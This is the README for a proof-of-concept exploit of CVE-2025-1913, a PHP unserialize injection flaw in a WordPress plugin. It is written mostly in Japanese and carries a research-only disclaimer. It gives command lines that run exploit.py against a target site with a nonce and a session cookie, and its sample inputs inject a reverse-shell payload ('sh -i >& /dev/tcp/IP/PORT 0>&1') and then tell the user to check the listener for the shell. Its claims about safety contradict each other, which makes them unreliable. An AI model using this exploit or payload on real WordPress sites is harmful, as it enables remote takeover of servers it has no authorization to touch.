
A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.
このリポジトリは、教育目的のみ の CVE-2025-1913 の Proof of Concept (PoC) で、Suhaib518 🇸🇦 によって作成されました。 この PoC は、特別に細工されたシリアル化された PHP 入力が、影響を受ける WordPress コンポーネントの脆弱なロジックをどのようにトリガーするかを示しています。 PoC は安全であり、悪意のあるペイロードは含まれていません。
⚠️ 免責事項: この PoC は学習、研究、および防御的なセキュリティテストのみを目的としています。 自分が所有していない、または明示的な許可を得ていないサーバーでは使用しないでください。
この脆弱性は、特定の WordPress プラグインのワークフローにおける PHP シリアル化データの安全でない処理に起因します。 この PoC は、攻撃者が意図しない内部動作を引き起こすように細工されたシリアル化構造を提供する方法を示しています。
このリポジトリには以下の Python スクリプトが含まれています:
.
├── CVE-2025-1913-PoC.py # Suhaib518 KSA によって作成された PoC スクリプト
└── README.md # ドキュメント
このスクリプトは、requests を除いて、組み込みの Python モジュールのみを使用します:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
以下の入力を求められます:
スクリプトはそれらをシリアル化し、WordPress リクエストを構築して送信します。
以下は、使用例を示すコマンド例です(これらは悪意のあるものではなく、プロセスを示すだけです):
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
対話型質問への回答例:
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
スクリプトは次のように出力します:
[*] Sending request…
....Check the listener for the shell.
unserialize() を使用しないMIT License.
Suhaib518 🇸🇦 によって作成されました。